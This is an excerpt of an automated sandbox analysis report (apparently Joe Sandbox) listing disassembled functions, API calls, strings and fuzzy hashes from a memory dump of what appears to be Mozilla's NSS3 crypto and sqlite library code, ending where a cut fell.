PR_SetError.NSS3(FFFFE022,00000000), ref: 6C77AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C899500), ref: 6C77AF23

Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C7CF0C8
Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7CF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C77AF37

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 185c613ea651363058e662ead888cc51e2dd6bd01095f9c0be3194c99d276fbc
Instruction ID: b5607a6d8b6eb8dd2ccc1709ca6656f1bb8f72ac2fed79c1be957535f1c222d7
Opcode Fuzzy Hash: 185c613ea651363058e662ead888cc51e2dd6bd01095f9c0be3194c99d276fbc
Instruction Fuzzy Hash: 062128B29092049BFF208E188E01B9A7BE4AF8573CF144728EC589B781E731D54887B3

Function 6C7FEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7FEE85
realloc.MOZGLUE(00335406,?), ref: 6C7FEEAE
PORT_Alloc_Util.NSS3(?), ref: 6C7FEEC5

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

htonl.WSOCK32(?), ref: 6C7FEEE3
htonl.WSOCK32(00000000,?), ref: 6C7FEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C7FEF01

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 98070ecdae83e1dfc767fc94a3895d6bcc3d3d947fcd11721ae2fe30d4b76f36
Instruction ID: 3413cae97319cb2a6a91c7f58506d456fdd1338e72f39c4192caf87e500ddb5b
Opcode Fuzzy Hash: 98070ecdae83e1dfc767fc94a3895d6bcc3d3d947fcd11721ae2fe30d4b76f36
Instruction Fuzzy Hash: 5621D671A002189FDB209F28DDC475A77A8EF45358F158139EC199B741D330ED15C7E2

Function 6C7AEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7AEE49

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7AEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C7AEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C7AEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7AEEB3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: a5b26b4bfb7332f09be47131540e118198577f02cc4bd3e88d8f2258f1c3a253
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: F82105B6A04215ABEB019E58ED89EABB7ACEF45708F040274FD049B301E771DC2587F1

Function 6C777F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C777F68

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C777F7B

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C777FA7

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C89919C,?), ref: 6C777FBB

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C777FCA
SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C89915C,00000014), ref: 6C777FFE

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1489184013-0
Opcode ID: 3efcd898d93e2eecdb73d02e1c241efaaed320dc200cf1d5bbe55c14acae3ebd
Instruction ID: f8c7c64de6932feeb26e14cc4ce7c3197afcb589687ee45946cc300ac4c8de98
Opcode Fuzzy Hash: 3efcd898d93e2eecdb73d02e1c241efaaed320dc200cf1d5bbe55c14acae3ebd
Instruction Fuzzy Hash: 56112B61E003085BEB20AA255F58B7B76A8DF4465CF000A39FC59D2B41F720A549C2B2

Function 6C77BE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6C7FDC29,?), ref: 6C77BE64

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C7FDC29,?), ref: 6C77BE78

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C7FDC29,?), ref: 6C77BE96

Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C7FDC29,?), ref: 6C77BEBB

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PR_SetError.NSS3(FFFFE013,00000000,?,6C7FDC29,?), ref: 6C77BEDF
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C7FDC29,?), ref: 6C77BEF3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 3111646008-0
Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction ID: b62e512297007cfa155aa3c19787c50fba2683ca8497461e3fa6426b88eb5d2a
Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction Fuzzy Hash: A011D571A002095BEF108B649E09FAA3BACEB41258F554038ED08EB780EB71F919C7B1

Function 6C803C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C803D3F

Part of subcall function 6C77BA90: PORT_NewArena_Util.NSS3(00000800,6C803CAF,?), ref: 6C77BABF
Part of subcall function 6C77BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C803CAF,?), ref: 6C77BAD5
Part of subcall function 6C77BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C803CAF,?), ref: 6C77BB08
Part of subcall function 6C77BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C803CAF,?), ref: 6C77BB1A
Part of subcall function 6C77BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C803CAF,?), ref: 6C77BB3B

PR_EnterMonitor.NSS3(?), ref: 6C803CCB

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

PR_EnterMonitor.NSS3(?), ref: 6C803CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C803CF8
PR_ExitMonitor.NSS3(?), ref: 6C803D15
PR_ExitMonitor.NSS3(?), ref: 6C803D2E

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: a86463fbd2441f4f304103dbec0d3f5225d4f80c97d7ed87d4d591dc6365948d
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: D91108767106006FE7305A69EE81F9BB3E4AB11209F505D34E80AD7B20E632FC19C652

Function 6C7CFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C7CFE08

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C7CFE1D

Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C7CFE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C7CFE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C7CFE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6C7CFE6F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 80015a5cb441ad1a8705533cb0d2696941433add39552b0bb3fbaa5c79a70a41
Instruction ID: c9f0f522b791ea8d2db9580e77d8b84ca90eb164eec62a1116eceb53aa507683
Opcode Fuzzy Hash: 80015a5cb441ad1a8705533cb0d2696941433add39552b0bb3fbaa5c79a70a41
Instruction Fuzzy Hash: 121108B6700206AFEB009F55DD44A5B73ACAF54399F158038E91C87B12E731E914C792

Function 6C87FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6C87FD9E

Part of subcall function 6C839BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C761A48), ref: 6C839BB3
Part of subcall function 6C839BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C761A48), ref: 6C839BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6C87FDB9

Part of subcall function 6C75A900: TlsGetValue.KERNEL32(00000000,?,6C8D14E4,?,6C6F4DD9), ref: 6C75A90F
Part of subcall function 6C75A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C75A94F

PR_Unlock.NSS3 ref: 6C87FDD4
PR_Lock.NSS3 ref: 6C87FDF2
PR_NotifyAllCondVar.NSS3 ref: 6C87FE0D
PR_Unlock.NSS3 ref: 6C87FE23

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: b0dd35df74c02141f9326dbc58ac251283c136326eb5df551ea3da12b169bbb8
Instruction ID: 1982037f4290001f1bcdd3adbce25797962b500a4d75396d0b1333fe231ce8a3
Opcode Fuzzy Hash: b0dd35df74c02141f9326dbc58ac251283c136326eb5df551ea3da12b169bbb8
Instruction Fuzzy Hash: 680182B6A04211AFDF354E59FE008567A63BF1227D7140775E82647BA1E722ED28C7C1

Function 6C75AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C75AFDA

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C75AFC4
unable to delete/modify collation sequence due to active statements, xrefs: 6C75AF5C
%s at line %d of [%.10s], xrefs: 6C75AFD3
misuse, xrefs: 6C75AFCE

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: e4c425fbf38fac8fae3911cf420a5bc8b9a3d5897ae6c79344fe79a391e8102d
Instruction ID: 1b702d19bb83ea1c6f156951525cd24a45d974971fe446a92ae4049b8277810f
Opcode Fuzzy Hash: e4c425fbf38fac8fae3911cf420a5bc8b9a3d5897ae6c79344fe79a391e8102d
Instruction Fuzzy Hash: 4391E171B012158FDB04CF59CA50ABABBF1BF45324F5984B8E864AB791CB31EC11CBA0

Function 6C7BFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C7BFC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7BFCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C7BFDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C7BFDDE

Part of subcall function 6C7C8800: TlsGetValue.KERNEL32(?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8821
Part of subcall function 6C7C8800: TlsGetValue.KERNEL32(?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C883D
Part of subcall function 6C7C8800: EnterCriticalSection.KERNEL32(?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8856
Part of subcall function 6C7C8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C7C8887
Part of subcall function 6C7C8800: PR_Unlock.NSS3(?,?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8899

Strings

pkcs11:, xrefs: 6C7BFC4F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 6010a69b4707018424b810454c4828a78702f40ab1d9bcf1491de665a8439a13
Instruction ID: 7de3444d60253af45a19fa4c916fbcc0566972a380aeb88abac69a439bb997f9
Opcode Fuzzy Hash: 6010a69b4707018424b810454c4828a78702f40ab1d9bcf1491de665a8439a13
Instruction Fuzzy Hash: D651D2BDB041129BEB109F69DF8AB9A33A5AB41B5CF150035DD047BB52EB30F904CB92

Function 6C6FBDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C6FBE02

Part of subcall function 6C829C40: memcmp.VCRUNTIME140(?,00000000,6C6FC52B), ref: 6C829D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6FBE9F

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FBE89
database corruption, xrefs: 6C6FBE93
%s at line %d of [%.10s], xrefs: 6C6FBE98

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 7b2fa88bd40d8af29843e56024921f7d90d0d34170c6ff9bd542e346189888f3
Instruction ID: e922ed12b410393ebc17d899b21ff6eb7301c676fbdeefe0d012cd666ea4da00
Opcode Fuzzy Hash: 7b2fa88bd40d8af29843e56024921f7d90d0d34170c6ff9bd542e346189888f3
Instruction Fuzzy Hash: 9D313731A0465A9BC710CF69C994AEBBBA3AF81394B098954EE681BB41D370ED07C7D4

Function 6C771EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C774C64,?,-00000004), ref: 6C771EE2

Part of subcall function 6C7D1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C771D97,?,?), ref: 6C7D1836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C774C64,?,-00000004), ref: 6C771F13
DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C774C64,?,-00000004), ref: 6C771F37
DER_DecodeTimeChoice_Util.NSS3(?,dLwl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C774C64,?,-00000004), ref: 6C771F53

Strings

dLwl, xrefs: 6C771F2B, 6C771F51

Memory Dump Source

